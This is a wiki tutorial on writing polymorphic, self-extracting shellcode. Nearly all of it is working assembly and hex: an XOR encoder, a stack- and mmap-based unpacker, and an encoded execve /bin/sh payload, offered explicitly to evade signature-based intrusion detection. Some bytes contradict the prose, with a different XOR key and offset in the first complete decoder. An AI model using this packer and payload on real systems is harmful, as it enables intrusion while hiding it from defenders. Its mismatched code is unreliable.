Shellcode/Self-modifying

From NetSec

Latest revision as of 02:33, 25 April 2013

Polymorphic and other self-modifying (such as self-extracting) shellcode can be used to obfuscate or help prevent the reverse engineering of the shellcode. Additionally, it can help to prevent signature-based shellcode recognition on the network layer by NIDS or NIPS systems. The example in this article is based on shellcode loaders (sources).


The code and ideas discussed here are part of an all-encompassing shellcode portal. Everything described here and the full source of any given code is available in the appendix, as well as in the downloadable shellcodecs package.


The encoder

XOR encoding is used here, but the method is easy to extend. Hundreds of encoding, encryption, and compression algorithms could be implemented instead, such as xor, inc, dec, add, sub, imul, idiv and any other operation that can be reversed to recover the original state; this is just a small example. For this encoder, each byte is XOR'd with 0x3 and written back into the buffer in a loop. The resulting binary can be written to a file or piped to hexdump or ndisasm for further analysis.
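The reversibility that the encoder relies on can be sketched in a few lines of Python. This is only a model of the idea, not the article's packer; the function name `xor_encode` is an assumption made for illustration, and the sample bytes are the first four bytes of the example payload used later in the article.

```python
def xor_encode(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key (hypothetical helper)."""
    return bytes(b ^ key for b in data)


sample = bytes.fromhex("4831ff6a")     # first four bytes of the example payload
encoded = xor_encode(sample, 0x03)     # encode with the article's key
decoded = xor_encode(encoded, 0x03)    # applying the same key again undoes it

print(encoded.hex(), decoded == sample)
```

Because XOR with a fixed key is its own inverse, the same routine serves as both encoder and decoder, which is why the unpacker later in the article only needs a single xor instruction per byte.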

64 bit

 
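count_chars:
    cmpb %dil, (%rbx, %rsi, 1)      # end of argument? (%dil holds zero)
    je write
    xorb $0x3, (%rbx, %rsi, 1)      # encode the current byte in place
    inc %rsi                        # advance the index, which doubles as the length
    jmp count_chars                 # counts characters and xor encodes them
 
write:
    mov $0x1, %rax                  # write syscall number
    mov $0x1, %rdi                  # file descriptor 1 (stdout)
    mov %rsi, %rdx                  # number of bytes counted above
    mov %rbx, %rsi                  # address of the encoded buffer
    syscall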
 

In this 64 bit snippet of the encoder (source), the shellcode passed as a command line argument is encoded and its length is counted in a single pass. %rbx holds the address of the argument and %rsi holds the index of the current byte. Each byte is compared against %dil, the lowest byte of the %rdi register, which is zero. If the tested byte is equal to zero, the end of the argument has been reached and the code jumps to the write label to print the encoded output. Otherwise the byte is XOR'd with 0x3, the counter in %rsi is incremented, and the code jumps back to the count_chars label. Note that 0x3 was chosen because the shellcode used does not contain this byte; a byte equal to the key would encode to a null byte, so a different value must be chosen if the shellcode does contain 0x3. The length must be counted because the write syscall needs to know the number of bytes to print off the stack, so instead of looping once to count the characters and looping again to encode them, the two passes are combined for efficiency.
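The constraint on the key can be checked mechanically. The sketch below is an illustration under stated assumptions: `key_is_usable` is a hypothetical helper, `PAYLOAD` is the 34 byte example payload from the usage section of this article, and the terminator value 0x20 is the one the unpacker checks for later in the article.

```python
# The 34 byte example payload used in the article's usage section.
PAYLOAD = bytes.fromhex(
    "4831ff6a69580f0557575e5a48bf6a2f62696e2f"
    "736848c1ef0857545f6a3b580f05"
)


def key_is_usable(payload: bytes, key: int, terminator: int = 0x20) -> bool:
    """Return True if XOR-encoding payload with key yields no problem bytes.

    Hypothetical check: a payload byte equal to the key encodes to 0x00,
    and an encoded byte equal to the terminator would end decoding early.
    """
    encoded = bytes(b ^ key for b in payload)
    return 0x00 not in encoded and terminator not in encoded


print(key_is_usable(PAYLOAD, 0x03))   # the key used in the article
print(key_is_usable(PAYLOAD, 0x48))   # 0x48 occurs in the payload
```

Running the same check over all 255 non-zero keys is a simple way to pick a replacement when 0x3 does not suit a given payload.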

32 bit

 
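count_chars:
        cmpb %dl, (%ecx, %ebx, 1)       # end of argument? (%dl holds zero)
        je write
        xorb $0x3, (%ecx, %ebx, 1)      # encode the current byte in place
        inc %ebx                        # advance the index, which doubles as the length
        jmp count_chars                 #counts characters and xor encodes them
 
write:
        push $4
        pop %eax                        # write syscall number
        mov %ebx, %edx                  # number of bytes counted above
        push $2
        pop %ebx                        # file descriptor 2
        int $0x80                       # buffer address is already in %ecx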
 

The difference between the 64 bit and 32 bit code is subtle. The main difference is that %dil does not exist in 32 bit code, so %dl (the lowest byte of %edx) is used in its place. The other difference is the write label, which uses the 32 bit system call convention (int $0x80) for write instead of the 64 bit convention (syscall).

The unpacker

Next, an unpacker is needed. It is essentially the same as the loader code, with some changes.

First, the shellcode must be read from the stack instead of from the command line arguments. To do this, a getpc function is implemented to retrieve the current instruction pointer so the shellcode can be found on the stack. A forward call encodes a small positive displacement, which puts null bytes into the operand of the call instruction, so getpc is placed before its caller and called backwards; calling backwards is also preferable for other reasons (including the call stack). To reach the caller, the code starts with a "jmp start" instruction.

 
jmp start
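The effect of call direction on the encoded bytes can be illustrated with a short Python sketch. It assumes the standard 5 byte near call encoding (opcode 0xe8 followed by a little-endian 32 bit displacement measured from the next instruction); the helper name `call_rel32` and the forward-call addresses are made up for illustration, while the backward call uses the addresses from the final disassembly in this article.

```python
import struct


def call_rel32(call_addr: int, target: int) -> bytes:
    """Encode an x86 near call: 0xe8 plus a little-endian rel32 (hypothetical helper)."""
    disp = target - (call_addr + 5)    # relative to the instruction after the call
    return b"\xe8" + struct.pack("<i", disp)


forward = call_rel32(0x00, 0x30)       # calling a function located after the call
backward = call_rel32(0x30, 0x2b)      # calling getpc located before the call

print(forward.hex(), backward.hex())
```

The forward call contains three null bytes, while the backward call pads its negative displacement with 0xff bytes and matches the `e8 f6 ff ff ff` sequence at offset 0x30 of the complete disassembly.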
 

Getpc is called and returns the address of the next instruction in %eax or %rbx, depending on the architecture. The number of bytes in the rest of the decoder is then added to this address, which gives the absolute address of the encoded shellcode on the stack. To find this offset, the decoder must first be completed and then run through objdump. Take the address of the last instruction of the decoder, add the length of that instruction, and subtract the address immediately after the getpc call.

For example:

 
0804807b <start>:
 804807b:       e8 f7 ff ff ff          call   8048077 <getpc>
 8048080:       89 c2                   mov    %eax,%edx
 8048082:       83 c2 2a                add    $0x2a,%edx
 
 #shortened for easier reading
 
 80480a8:       cd 80                   int    $0x80
 
 

In this example the getpc call returns 8048080. The last instruction of the decoder is at 80480a8 and is 2 bytes long, so the real end address of the decoder is 80480aa. Subtracting the returned address from the end address gives the offset to add: 0xAA - 0x80 = 0x2A.
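The same arithmetic can be written out as a small Python check. The addresses are the ones from the objdump excerpt above; the variable names are chosen here for illustration only.

```python
getpc_return = 0x8048080      # address of the instruction after "call getpc"
last_insn_addr = 0x80480a8    # address of the final "int $0x80"
last_insn_len = 2             # "cd 80" is two bytes long

decoder_end = last_insn_addr + last_insn_len   # first byte after the decoder
offset = decoder_end - getpc_return            # value to add to the getpc result

print(hex(decoder_end), hex(offset))
```

The offset has to be recomputed whenever an instruction is added to or removed from the decoder between the getpc call and its end.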

 
start:
    call getpc
    add $0x31,%rbx # add the length of the rest of the decoder to the instruction pointer to get the address of the encoded payload
 

Next, the address of the shellcode is pushed onto the stack and the "inject" function is called.

 
    push %rbx # push address of shellcode
    call inject
 

The call instruction pushes the address of the next instruction (where the program is supposed to return to) onto the stack and then jumps to the function; in this case that address is the exit function. Inject pops this return address (the address of exit) off the stack so that it can later be replaced with the address of the decoded shellcode.

 
inject: 
    pop %rdi # pop the return address (to exit)
 

Then the copying loop is initialized:

 
    xor %rsi, %rsi # zero out counter
    push %rsi
    pop %rdi    
 

First, check whether the end of the encoded shellcode has been reached. The shellcode in this example is terminated with 0x20; choose a different terminator byte if 0x20 appears in the encoded shellcode.

 
inject_loop:
    cmpb $0x20, (%rax, %rsi, 1)
    je inject_finished
 

If not, decode a single byte by XOR'ing it against the encode-byte:

 
    movb (%rax, %rsi, 1), %r10b 
    xor $0x3, %r10b
 

The XOR'd byte is then copied back into the shellcode:

 
    movb %r10b, (%rax, %rsi, 1)
 

Now the counter is incremented and the code jumps back to the beginning of inject_loop:

 
    inc %rsi
    jmp inject_loop
 


After the loop is completed, the ret opcode (0xc3) is appended to the decoded shellcode.

 
inject_finished:
    inc %rsi 
    movb $0xc3, (%rax, %rsi, 1) # append 0xc3 (the ret opcode)
 

Next, a call stack is formed by pushing the original return address (the address of exit that was popped off the stack at the beginning of this function), then pushing the address of the shellcode and executing ret. Because the address of the shellcode now sits above the address of exit on the stack, the ret returns into the shellcode, which in turn returns into the exit function, exiting cleanly.

 
    push %rdi                   # push original return address onto stack
    push %rax                   # push address of shellcode to stack
    ret                         # return into shellcode
 

When the shellcode finishes, it will execute the appended "ret" instruction (0xc3) and return into exit.
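The control flow of inject_loop can be modeled in Python to make the terminator logic easier to follow. This is a sketch of the loop only, under the assumption of a 0x3 key and a 0x20 terminator as in the walkthrough; the function name `unpack` is hypothetical, and the model returns the decoded bytes instead of writing them back in place or appending the ret opcode.

```python
def unpack(buffer: bytes, key: int = 0x03, terminator: int = 0x20) -> bytes:
    """Model of inject_loop: decode bytes until the terminator is reached.

    Raises IndexError if the buffer contains no terminator, which mirrors
    the assembly version running off the end of its input.
    """
    decoded = bytearray()
    index = 0                                  # plays the role of %rsi
    while buffer[index] != terminator:         # cmpb $0x20 / je inject_finished
        decoded.append(buffer[index] ^ key)    # xor $0x3, %r10b
        index += 1                             # inc %rsi
    return bytes(decoded)


encoded = bytes.fromhex("4b32fc69") + b"\x20"  # four encoded bytes plus terminator
print(unpack(encoded).hex())
```

The terminator is compared against the encoded bytes before they are decoded, which is why it must not occur anywhere in the encoded payload.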

The complete decoder is:

\xeb\x2c\x5f\x48\x31\xf6\x56\x5f\x80\x3c\x33\x20\x74\x11\x44\x8a\x14\x33\x41\x80\xf2\x11\x44\x88\x14\x33\x48\xff\xc6\xeb\xe9\x48\xff\xc6\xc6\x04\x33\xc3\x57\x53\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x0e\x53\xe8\xc5\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05

Self-extracting code

Self-extracting shellcode can extract itself into executable memory. To do this, mmap() is used as detailed in this section. The same shellcode as before is used, with some changes. In the start function mmap() is called and the returned pointer is saved in %rax. This address is pushed onto the stack before the address of the shellcode, and inject is then called. Inject pops the mmap()'d address into %rcx, and inside inject_loop the XOR'd byte is copied into the mmap()'d memory instead of back into the shellcode. Finally, the code returns into the mmap()'d memory instead of the encoded shellcode on the stack. The completed code:

 
inject_loop:
    cmpb $0x20, (%rax, %rsi, 1)
    je inject_finished
    movb (%rax, %rsi, 1), %r10b
    xor $0x3, %r10b
    movb %r10b, (%rcx, %rsi, 1)
    inc %rsi
    jmp inject_loop
 
inject_finished:
    inc %rsi 
    movb $0xc3, (%rcx, %rsi, 1)
    push %rdi
    push %rcx
    ret
 

Tying it together

To use this shellcode, the payload should look like:

 [decoder shellcode][encoded payload][0x20]

A usage example:

 ╭─user@host ~  
 ╰─➤    ./packer "$(echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58
 \x0f\x05");" |hexdump -C |sed 's/^[0-9a-f]........//g' |sed 's/|.*|$//g' |sed 's/  / /g' |sed 's/ /\\x/g' |sed 's/\\x\\x//g' |sed 's/\\x$//g' |grep x |awk '{printf("%s ", $0)}' |sed 's/ //g'
\x4b\x32\xfc\x69\x6a\x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06
  1. Add "\x20" to the end of the newly encoded shellcode as a terminator.
  2. Append the newly terminated shellcode to the decoder shellcode.
  3. Test the polymorphic code:
 ╭─user@host ~  
 ╰─➤  ./loader "$(echo -en 
 "\xeb\x2c\x5f\x48\x31\xf6\x56\x5f\x80\x3c\x33\x20\x74\x11\x44\x8a\x14\x33\x41\x80\xf2\x11\x44\x88\x14\x33\x48\xff\xc6\xeb\xe9\x48\xff\xc6\xc6\x04\x33
  \xc3\x57\x53\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x0e\x53\xe8\xc5\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05\x4b\x32\xfc\x69\x6a
  \x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06\x20")"
 [user@host ~]$ exit
 exit
 ╭─user@host ~  
 ╰─➤  
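The encoded string printed by the packer can be cross-checked without the hexdump and sed pipeline. The following Python sketch assumes only the two byte strings shown in the usage example above; the helper name `as_escapes` is made up for illustration.

```python
# Original payload passed to ./packer in the usage example.
ORIGINAL = bytes.fromhex(
    "4831ff6a69580f0557575e5a48bf6a2f62696e2f"
    "736848c1ef0857545f6a3b580f05"
)
# Encoded string printed by the pipeline in the usage example.
PUBLISHED = bytes.fromhex(
    "4b32fc696a5b0c0654545d594bbc692c616a6d2c"
    "706b4bc2ec0b54575c69385b0c06"
)


def as_escapes(data: bytes) -> str:
    """Format bytes as a \\x-escaped string (hypothetical helper)."""
    return "".join(f"\\x{b:02x}" for b in data)


recomputed = bytes(b ^ 0x03 for b in ORIGINAL)
print(recomputed == PUBLISHED)
print(as_escapes(recomputed))
```

The comparison confirms that the published string is the original payload XOR'd byte by byte with 0x3.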

When the 34 byte /bin/sh shellcode is encoded and disassembled, it looks like:

 
╭─user@host ~  
╰─➤  ./packer "$(echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58 
\x0f\x05");" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode 
shellcode:     file format binary
Disassembly of section .data:
00000000 <.data>:
  0:	4b 32 fc             	rex.WXB xor %r12b,%dil
  3:	69 6a 5b 0c 06 54 54 	imul   $0x5454060c,0x5b(%rdx),%ebp
  a:	5d                   	pop    %rbp
  b:	59                   	pop    %rcx
  c:	4b bc 69 2c 61 6a 6d 	rex.WXB movabs $0x6b702c6d6a612c69,%r12
  13:	2c 70 6b 
  16:	4b c2 ec 0b          	rex.WXB retq $0xbec
  1a:	54                   	push   %rsp
  1b:	57                   	push   %rdi
  1c:	5c                   	pop    %rsp
  1d:	69 38 5b 0c 06 38    	imul   $0x38060c5b,(%rax),%edi
╭─user@host ~  
╰─➤  
 

This doesn't look anything like an execve() routine. Disassembling the entire payload gives:

 
╭─user@host ~  
╰─➤  echo -en  "\xeb\x2e\x5f\x58\x59\x48\x31\xf6\x56\x5f\x80\x3c\x30\x20\x74\x11\x44\x8a\x14\x30\x41\x80\xf2\x03\x44\x88\x14\x31\x48\xff\xc6\xeb\xe9\x48\xff\xc6
\xc6\x04\x31\xc3\x57\x51\xc3\x48\x8b\x1c\x24\xc3\xe8\xf6\xff\xff\xff\x48\x83\xc3\x31\x6a\x09\x58\x48\x31\xff\x57\x5e\x48\xff\xc6\x48\xc1\xe6\x12\x6a\x07\x5a\x6a
\x22\x41\x5a\x57\x57\x41\x58\x41\x59\x0f\x05\x50\x53\xe8\xa4\xff\xff\xff\x6a\x3c\x58\x48\x31\xff\x0f\x05\x4b\x32\xfc\x69\x6a\x5b\x0c\x06\x54\x54\x5d\x59\x4b\xbc
\x69\x2c\x61\x6a\x6d\x2c\x70\x6b\x4b\xc2\xec\x0b\x54\x57\x5c\x69\x38\x5b\x0c\x06\x20" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
 
shellcode:     file format binary
 
 
Disassembly of section .data:
 
00000000 <.data>:
   0:	eb 2e                	jmp    0x30
   2:	5f                   	pop    %rdi
   3:	58                   	pop    %rax
   4:	59                   	pop    %rcx
   5:	48 31 f6             	xor    %rsi,%rsi
   8:	56                   	push   %rsi
   9:	5f                   	pop    %rdi
   a:	80 3c 30 20          	cmpb   $0x20,(%rax,%rsi,1)
   e:	74 11                	je     0x21
  10:	44 8a 14 30          	mov    (%rax,%rsi,1),%r10b
  14:	41 80 f2 03          	xor    $0x3,%r10b
  18:	44 88 14 31          	mov    %r10b,(%rcx,%rsi,1)
  1c:	48 ff c6             	inc    %rsi
  1f:	eb e9                	jmp    0xa
  21:	48 ff c6             	inc    %rsi
  24:	c6 04 31 c3          	movb   $0xc3,(%rcx,%rsi,1)
  28:	57                   	push   %rdi
  29:	51                   	push   %rcx
  2a:	c3                   	retq   
  2b:	48 8b 1c 24          	mov    (%rsp),%rbx
  2f:	c3                   	retq   
  30:	e8 f6 ff ff ff       	callq  0x2b
  35:	48 83 c3 31          	add    $0x31,%rbx
  39:	6a 09                	pushq  $0x9
  3b:	58                   	pop    %rax
  3c:	48 31 ff             	xor    %rdi,%rdi
  3f:	57                   	push   %rdi
  40:	5e                   	pop    %rsi
  41:	48 ff c6             	inc    %rsi
  44:	48 c1 e6 12          	shl    $0x12,%rsi
  48:	6a 07                	pushq  $0x7
  4a:	5a                   	pop    %rdx
  4b:	6a 22                	pushq  $0x22
  4d:	41 5a                	pop    %r10
  4f:	57                   	push   %rdi
  50:	57                   	push   %rdi
  51:	41 58                	pop    %r8
  53:	41 59                	pop    %r9
  55:	0f 05                	syscall 
  57:	50                   	push   %rax
  58:	53                   	push   %rbx
  59:	e8 a4 ff ff ff       	callq  0x2
  5e:	6a 3c                	pushq  $0x3c
  60:	58                   	pop    %rax
  61:	48 31 ff             	xor    %rdi,%rdi
  64:	0f 05                	syscall 
  66:	4b 32 fc             	rex.WXB xor %r12b,%dil
  69:	69 6a 5b 0c 06 54 54 	imul   $0x5454060c,0x5b(%rdx),%ebp
  70:	5d                   	pop    %rbp
  71:	59                   	pop    %rcx
  72:	4b bc 69 2c 61 6a 6d 	rex.WXB movabs $0x6b702c6d6a612c69,%r12
  79:	2c 70 6b 
  7c:	4b c2 ec 0b          	rex.WXB retq $0xbec
  80:	54                   	push   %rsp
  81:	57                   	push   %rdi
  82:	5c                   	pop    %rsp
  83:	69 38 5b 0c 06 20    	imul   $0x20060c5b,(%rax),%edi
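The register setup between offsets 0x39 and 0x55 in the listing above is the mmap() call from the self-extracting section. The Python sketch below decodes the immediate values, assuming the Linux x86-64 constant values written out in the code; the names mirror the usual C header names, and nothing here calls mmap() itself.

```python
# Linux x86-64 values, written out explicitly as assumptions for this sketch.
SYS_MMAP = 9
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
MAP_PRIVATE, MAP_ANONYMOUS = 0x02, 0x20

# Immediates taken from the disassembly.
syscall_number = 0x9        # pushq $0x9 / pop %rax
length = 1 << 0x12          # inc %rsi / shl $0x12,%rsi
prot = 0x7                  # pushq $0x7 / pop %rdx
flags = 0x22                # pushq $0x22 / pop %r10

print(syscall_number == SYS_MMAP)
print(length, hex(length))
print(prot == PROT_READ | PROT_WRITE | PROT_EXEC)
print(flags == MAP_PRIVATE | MAP_ANONYMOUS)
```

Read this way, the call requests a private anonymous mapping of 0x40000 bytes that is readable, writable, and executable, which is the region the decoded bytes are copied into.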